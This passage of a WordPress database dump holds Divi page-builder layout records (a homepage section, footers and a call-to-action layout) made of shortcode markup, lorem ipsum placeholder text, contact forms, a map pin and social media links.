labore.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Source Sans Pro||||on\" text_font_size=\"20\" text_text_color=\"#d94b6a\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px|||\"]\n\n<p><a style=\"color:#D94B6A\" href=\"#\">Read More</a></p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_gallery admin_label=\"Gallery\" gallery_ids=\"1062,1084,1128,1129,1130,1131,1132,1133\" fullwidth=\"off\" show_title_and_caption=\"off\" show_pagination=\"off\" background_layout=\"light\" auto=\"off\" hover_overlay_color=\"rgba(255,255,255,0.9)\" caption_all_caps=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" zoom_icon_color=\"#d94b6a\"]\n\n\n\n[/et_pb_gallery][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" custom_padding=\"0px|0px\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" padding_mobile=\"off\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"on\" bg_img_1=\"http://localhost:8888/wp/wp-content/uploads/2016/03/046.jpg\" background_color_2=\"#f4f4f4\" column_padding_mobile=\"on\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\"][et_pb_column type=\"1_2\"][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_cta admin_label=\"Call To Action\" title=\"I’m a CTA\" button_url=\"#\" url_new_window=\"off\" button_text=\"LEARN MORE\" use_background_color=\"off\" background_color=\"#7EBEC5\" background_layout=\"dark\" text_orientation=\"center\" max_width=\"460px\" header_font=\"Playfair Display||||\" header_font_size=\"62\" header_text_color=\"#353535\" body_font=\"Source Sans Pro Light||||\" body_font_size=\"24\" body_text_color=\"#888888\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_text_size=\"16\" button_text_color=\"#ffffff\" button_bg_color=\"#d94b6a\" button_border_width=\"6\" button_border_color=\"#d94b6a\" button_border_radius=\"100\" button_letter_spacing=\"3\" button_font=\"Source Sans Pro|on|||\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"#d86880\" button_border_color_hover=\"#d86880\" button_border_radius_hover=\"100\" button_letter_spacing_hover=\"3\" custom_css_promo_button=\"width:190px;||\" custom_css_promo_description=\"margin-bottom:10px;||margin-top:30px;\" header_line_height=\"1.4em\" body_line_height=\"1.3em\" header_font_size_tablet=\"32\" header_font_size_last_edited=\"on|phone\" custom_margin=\"27%||27%|\"]\n\n<p>Lorem ipsum dolor sit amet, me consetur adipiscing elit, sed do eiusmod est tempor incididunt ut labore et dolore maqua.</p>\n\n[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_padding=\"0px|0px\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"980px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" custom_padding=\"120px|60px\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Playfair Display||||\" text_font_size=\"62\" text_text_color=\"#333333\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px|||\" text_font_size_tablet=\"42px\" text_font_size_last_edited=\"on|tablet\"]\n\n<p>Our Clients</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" max_width=\"720px\" text_font=\"Source Sans Pro Light||||\" text_font_size=\"24\" text_text_color=\"#888888\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\"]\n\n<p>Sed ut perspiciatis unde omnis iste natus errorae  sit voluptatem accusa antium doloremque nor laudantium, totam rem. Consect edipi.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"980px\" use_custom_gutter=\"off\" custom_padding=\"0px|140px\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/08.png\" show_in_lightbox=\"off\" url_new_window=\"off\" animation=\"fade_in\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/091.png\" show_in_lightbox=\"off\" url_new_window=\"off\" animation=\"fade_in\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/103.png\" show_in_lightbox=\"off\" url_new_window=\"off\" animation=\"fade_in\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/114.png\" show_in_lightbox=\"off\" url_new_window=\"off\" animation=\"fade_in\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n\n\n[/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section]','Homepage #3','','publish','closed','closed','','homepage-3','','','2016-03-31 19:28:09','2016-03-31 17:28:09','',0,'https://companyregistration.online/et_pb_layout/homepage-3/',0,'et_pb_layout','',0),(3896,1,'2016-04-22 19:21:09','2016-04-22 17:21:09','<p>[et_pb_section admin_label=\"section\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" gutter_width=\"1\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding=\"120px||0px|\" custom_padding_tablet=\"100px||0px|\" custom_padding_last_edited=\"on|tablet\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Playfair Display||||\" text_font_size=\"64\" text_font_size_tablet=\"46\" text_font_size_last_edited=\"on|tablet\" text_text_color=\"#3b3d40\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||40px|\" custom_margin_tablet=\"||20px|\" custom_margin_last_edited=\"on|tablet\"]</p><p>Get In Touch</p><p>[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" max_width=\"510px\" text_font=\"Source Sans Pro||||\" text_font_size=\"24\" text_font_size_last_edited=\"on|tablet\" text_text_color=\"#827f7f\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.4em\" text_font_size_tablet=\"18\"]</p><p>Sed ut perspiciatis unde omnis iste natus errorae sit voluptatem accusa antium.</p><p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"56px||120px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_width_px=\"660px\" custom_padding_tablet=\"16px||100px|\" custom_padding_last_edited=\"on|tablet\"][et_pb_column type=\"4_4\"][et_pb_contact_form admin_label=\"Contact Form\" captcha=\"off\" use_redirect=\"off\" form_background_color=\"#f9f9f9\" input_border_radius=\"3\" title_text_color=\"#848282\" form_field_text_color=\"#848282\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_letter_spacing=\"1\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_letter_spacing_hover=\"0\" title_font=\"Source Sans Pro||||\" title_font_size=\"18\" form_field_font=\"Source Sans Pro||||\" form_field_font_size=\"18\" button_text_size=\"18\" button_text_color=\"#ffffff\" button_bg_color=\"#d94b6a\" button_font=\"Montserrat||||\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"#d94b6a\" button_border_color_hover=\"#d94b6a\" button_border_radius=\"4\" button_border_radius_hover=\"4\" button_border_width=\"4\" button_border_color=\"#d94b6a\"]</p><p>[et_pb_contact_field field_title=\"Name\" field_type=\"input\" field_id=\"Name\" required_mark=\"on\" fullwidth_field=\"off\" /][et_pb_contact_field field_title=\"Email Address\" field_type=\"email\" field_id=\"Email\" required_mark=\"on\" fullwidth_field=\"off\" /][et_pb_contact_field field_title=\"Message\" field_type=\"text\" field_id=\"Message\" required_mark=\"on\" /]</p><p>[/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"0px||0px|\"][et_pb_column type=\"4_4\"][et_pb_map admin_label=\"Map\" address=\"San Francisco, California, Stati Uniti\" zoom_level=\"14\" address_lat=\"37.77452423234226\" address_lng=\"-122.42045083267976\" mouse_wheel=\"off\" use_grayscale_filter=\"on\" grayscale_filter_amount=\"100\"]</p><p>[et_pb_map_pin pin_address=\"10 S Van Ness Ave, San Francisco, CA 94103, Stati Uniti\" pin_address_lat=\"37.77447156129669\" pin_address_lng=\"-122.41969444973756\"][/et_pb_map_pin]</p><p>[/et_pb_map][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" background_color=\"#3c3d41\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" gutter_width=\"2\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"30px||30px|\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\"][et_pb_column type=\"1_2\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Raleway|on|||\" text_font_size=\"28\" text_text_color=\"#ffffff\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||8px|\" custom_css_main_element=\"font-weight: 800;\"]</p><div>maker <span style=\"font-weight: normal;vertical-align: middle;color: #888;font-size: 14px\"><em>Show me your catchy slogan!</em></span></div><p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_social_media_follow admin_label=\"Social Media Follow\" link_shape=\"circle\" background_layout=\"light\" url_new_window=\"off\" follow_button=\"off\" custom_css_main_element=\"float:right;\"]</p><p>[et_pb_social_media_follow_network social_network=\"facebook\" url=\"#\" skype_action=\"call\" bg_color=\"#3b5998\"]</p><p>facebook</p><p>[/et_pb_social_media_follow_network][et_pb_social_media_follow_network social_network=\"twitter\" url=\"#\" skype_action=\"call\" bg_color=\"#00aced\"]</p><p>Twitter</p><p>[/et_pb_social_media_follow_network][et_pb_social_media_follow_network social_network=\"google-plus\" url=\"#\" skype_action=\"call\" bg_color=\"#dd4b39\"]</p><p>Google+</p><p>[/et_pb_social_media_follow_network][et_pb_social_media_follow_network social_network=\"pinterest\" url=\"#\" skype_action=\"call\" bg_color=\"#cb2027\"]</p><p>Pinterest</p><p>[/et_pb_social_media_follow_network]</p><p>[/et_pb_social_media_follow][/et_pb_column][/et_pb_row][/et_pb_section]</p>','Footer #1','','publish','closed','closed','','footer-1','','','2016-04-22 19:21:09','2016-04-22 17:21:09','',0,'https://companyregistration.online/et_pb_layout/footer-1/',0,'et_pb_layout','',0),(3897,1,'2016-04-22 19:21:15','2016-04-22 17:21:15','<p>[et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"on\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"on\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/018.jpg\" custom_padding=\"0px||0px|\" gutter_width=\"4\"][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/02-1.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"90px|||\"]</p><p> </p><p>[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Source Sans Pro|on|||\" text_font_size=\"24\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"25px||4px|\"]</p><p>0039 3476 1355</p><p>[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Source Sans Pro||||\" text_font_size=\"18\" text_text_color=\"#aaaaaa\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]</p><p>Customer Service</p><p>[/et_pb_text][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/03-2.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"90px|||\"]</p><p> </p><p>[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Source Sans Pro||||\" text_font_size=\"18\" text_text_color=\"#aaaaaa\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.4em\" custom_margin=\"25px|||\"]</p><p>New York. Address: 350 Fifth<br /> Avenue, 34th floor.</p><p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" specialty_columns=\"2\"][et_pb_row_inner admin_label=\"Row\" custom_padding=\"132px||120px|\" padding_mobile=\"on\" use_custom_gutter=\"off\" column_padding_mobile=\"on\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" custom_padding_last_edited=\"on|tablet\" custom_padding_tablet=\"60px||120px|\"][et_pb_column_inner type=\"4_4\" saved_specialty_column_type=\"2_3\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Playfair Display||||\" text_font_size=\"64\" text_font_size_tablet=\"46\" text_font_size_last_edited=\"on|tablet\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||40px|\" custom_margin_tablet=\"||20px|\" custom_margin_last_edited=\"on|tablet\"]</p><p>Get In Touch</p><p>[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" max_width=\"510px\" text_font=\"Source Sans Pro||||\" text_font_size=\"24\" text_font_size_last_edited=\"on|tablet\" text_text_color=\"#aaaaaa\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.4em\" text_font_size_tablet=\"18\"]</p><p>Sed ut perspiciatis unde omnis iste natus errorae sit voluptatem accusa antium.</p><p>[/et_pb_text][et_pb_contact_form admin_label=\"Contact Form\" captcha=\"off\" use_redirect=\"off\" form_background_color=\"#f9f9f9\" input_border_radius=\"3\" title_text_color=\"#848282\" form_field_text_color=\"#848282\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_letter_spacing=\"1\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_letter_spacing_hover=\"0\" title_font=\"Source Sans Pro||||\" title_font_size=\"18\" form_field_font=\"Source Sans Pro||||\" form_field_font_size=\"18\" button_text_size=\"18\" button_text_color=\"#ffffff\" button_bg_color=\"#d94b6a\" button_font=\"Montserrat||||\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"#d94b6a\" button_border_color_hover=\"#d94b6a\" button_border_radius=\"4\" button_border_radius_hover=\"4\" button_border_width=\"4\" button_border_color=\"#d94b6a\"] [et_pb_contact_field field_title=\"Name\" field_type=\"input\" field_id=\"Name\" required_mark=\"on\" fullwidth_field=\"off\" /][et_pb_contact_field field_title=\"Email Address\" field_type=\"email\" field_id=\"Email\" required_mark=\"on\" fullwidth_field=\"off\" /][et_pb_contact_field field_title=\"Message\" field_type=\"text\" field_id=\"Message\" required_mark=\"on\" /] [/et_pb_contact_form][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" background_color=\"#3c3d41\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" gutter_width=\"2\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"30px||30px|\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\"][et_pb_column type=\"1_2\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Raleway|on|||\" text_font_size=\"28\" text_text_color=\"#ffffff\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||8px|\" custom_css_main_element=\"font-weight: 800;\"]</p><div>maker <span style=\"font-weight: normal;vertical-align: middle;color: #888;font-size: 14px\"><em>Show me your catchy slogan!</em></span></div><p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_social_media_follow admin_label=\"Social Media Follow\" link_shape=\"circle\" background_layout=\"light\" url_new_window=\"off\" follow_button=\"off\" custom_css_main_element=\"float:right;\"] [et_pb_social_media_follow_network social_network=\"facebook\" url=\"#\" skype_action=\"call\" bg_color=\"#3b5998\"]</p><p>facebook</p><p>[/et_pb_social_media_follow_network][et_pb_social_media_follow_network social_network=\"twitter\" url=\"#\" skype_action=\"call\" bg_color=\"#00aced\"]</p><p>Twitter</p><p>[/et_pb_social_media_follow_network][et_pb_social_media_follow_network social_network=\"google-plus\" url=\"#\" skype_action=\"call\" bg_color=\"#dd4b39\"]</p><p>Google+</p><p>[/et_pb_social_media_follow_network][et_pb_social_media_follow_network social_network=\"pinterest\" url=\"#\" skype_action=\"call\" bg_color=\"#cb2027\"]</p><p>Pinterest</p><p>[/et_pb_social_media_follow_network] [/et_pb_social_media_follow][/et_pb_column][/et_pb_row][/et_pb_section]</p>','Footer #2','','publish','closed','closed','','footer-2-2','','','2016-04-22 19:21:15','2016-04-22 17:21:15','',0,'https://companyregistration.online/et_pb_layout/footer-2-2/',0,'et_pb_layout','',0),(3898,1,'2016-04-22 19:21:22','2016-04-22 17:21:22','<p>[et_pb_section admin_label=\"section\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/022.jpg\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" gutter_width=\"1\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding=\"132px||122px|\" custom_padding_tablet=\"100px||100px|\" custom_padding_last_edited=\"on|phone\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Playfair Display||||\" text_font_size=\"64\" text_font_size_tablet=\"46\" text_font_size_last_edited=\"on|tablet\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||10px|\" custom_margin_last_edited=\"on|desktop\" text_line_height=\"1.5em\"]</p><p>Did you like this?</p><p>[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" max_width=\"460px\" text_font=\"Source Sans Pro||||\" text_font_size=\"24\" text_font_size_last_edited=\"on|tablet\" text_text_color=\"#aaaaaa\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.4em\" text_font_size_tablet=\"18\" custom_margin=\"||21px|\"]</p><p>Lorem ipsum dolor sit amet, me consetur adipiscing elit, sed do eiusmod est tempor incididunt ut labore et dolore maqua.</p><p>[/et_pb_text][et_pb_button admin_label=\"Button\" url_new_window=\"off\" button_text=\"LEARN MORE\" button_alignment=\"center\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"16\" button_text_color=\"#ffffff\" button_bg_color=\"#d94b6a\" button_border_width=\"10\" button_border_color=\"#d94b6a\" button_border_radius=\"100\" button_letter_spacing=\"3\" button_font=\"Source Sans Pro|on|||\" button_use_icon=\"default\" button_icon_color=\"#ffffff\" button_icon_placement=\"right\" button_on_hover=\"on\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"#d94b6a\" button_border_color_hover=\"#d94b6a\" button_border_radius_hover=\"100\" button_letter_spacing_hover=\"3\" custom_css_main_element=\"width:190px;\"] [/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" background_color=\"#3c3d41\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" gutter_width=\"2\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"50px||50px|\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\"][et_pb_column type=\"1_2\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Raleway|on|||\" text_font_size=\"28\" text_text_color=\"#ffffff\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||8px|\" custom_css_main_element=\"font-weight: 900;\"]</p><p>maker</p><p>[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Source Sans Pro||||\" text_font_size=\"16\" text_text_color=\"#aaaaaa\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_padding=\"0px|||\" max_width=\"300px\" custom_margin=\"||30px|\" custom_margin_tablet=\"||10px|\" custom_margin_last_edited=\"on|tablet\"]</p><p>Maecenas eu placerat ante. Fusce ut neque justo, aliquet enim. In hac habitasse platea aumst. Nullam commodo au erat.</p><p>[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Source Sans Pro||||\" text_font_size=\"12\" text_text_color=\"#aaaaaa\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_padding=\"0px|||\" max_width=\"300px\"]</p><p>© 2016 Maker Pty Ltd.</p><p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Source Sans Pro|on|||\" text_font_size=\"18\" text_text_color=\"#666666\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||8px|\"]</p><p>MEET MAKER</p><p>[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Source Sans Pro||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" text_line_height=\"2.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_padding=\"0px|||\"]</p><p><span style=\"color: #ffffff\"><a style=\"color: #ffffff\" href=\"#\">About Maker</a></span><br /> <span style=\"color: #ffffff\"><a style=\"color: #ffffff\" href=\"#\">Explore our Ecosystem</a></span><br /> <span style=\"color: #ffffff\"><a style=\"color: #ffffff\" href=\"#\">Careers</a></span><br /> <span style=\"color: #ffffff\"><a style=\"color: #ffffff\" href=\"#\">Community Meetups</a></span><br /> <span style=\"color: #ffffff\"><a style=\"color: #ffffff\" href=\"#\">Help Center</a></span><br /> <span style=\"color: #ffffff\"><a style=\"color: #ffffff\" href=\"#\">Contact Us</a></span></p><p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Source Sans Pro|on|||\" text_font_size=\"18\" text_text_color=\"#666666\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||8px|\"]</p><p>FOLLOW US</p><p>[/et_pb_text][et_pb_social_media_follow admin_label=\"Social Media Follow\" link_shape=\"circle\" background_layout=\"light\" url_new_window=\"off\" follow_button=\"off\"] [et_pb_social_media_follow_network social_network=\"facebook\" url=\"#\" skype_action=\"call\" bg_color=\"#3b5998\"]</p><p>facebook</p><p>[/et_pb_social_media_follow_network][et_pb_social_media_follow_network social_network=\"twitter\" url=\"#\" skype_action=\"call\" bg_color=\"#00aced\"]</p><p>Twitter</p><p>[/et_pb_social_media_follow_network][et_pb_social_media_follow_network social_network=\"google-plus\" url=\"#\" skype_action=\"call\" bg_color=\"#dd4b39\"]</p><p>Google+</p><p>[/et_pb_social_media_follow_network][et_pb_social_media_follow_network 